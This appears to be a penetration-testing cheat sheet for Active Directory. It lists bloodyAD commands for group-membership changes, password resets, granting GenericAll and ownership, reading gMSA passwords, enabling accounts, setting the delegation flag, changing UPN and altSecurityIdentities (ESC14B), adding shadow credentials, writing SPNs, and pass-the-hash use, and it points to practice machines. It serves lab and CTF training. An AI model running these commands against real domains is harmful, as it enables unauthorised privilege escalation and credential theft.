1
| bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username
|
Add User To Group
1
| bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add
|
Change Password
1
| bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password
|
Give User GenericAll Rights
1
| bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username
|
WriteOwner
1
| bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username
|
ReadGMSAPassword
1
| bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword
|
Enable a Disabled Account
1
| bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE
|
Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag
1
| bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION
|
Modify UPN
1
| bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn
|
Check if it has been modified
1
| bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr userPrincipalName
|
MachineAccountQuota
Enumerate MachineAccountQuota
1
| bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota
|
Set MachineAccountQuota value to 10
1
| bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10
|
Modify mail
1
| bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@test.local
|
Modify the altSecurityIdentities attribute (ESC14B)
1
| bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@test.local'
|
Find Writable Attributes
1
| bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
|
Shadow Credentials
1
| bloodyAD --host $dc -d $domain -u $username -p $password add shadowCredentials $target
|
WriteSPN
1
| bloodyAD --host $dc -d $domain -u $username -p $password set object $target servicePrincipalName -v 'domain/meow'
|
Notes
- To use Kerberos, obtain a TGT, export it, and then pass
-k instead of providing a username and password
- You can pass a user hash instead of a password using
-p :hash
- Specify format for ‘–password’ or ‘-k ‘ using
-f, e.g. -f rc4
Resources
Machines To Practice
- Redelegate (Vulnlab)
- Vintage (HackTheBox)
- Infiltrator (HackTheBox)
- Rebound (HackTheBox)
- Absolute (HackTheBox)
- Certified (HackTheBox)
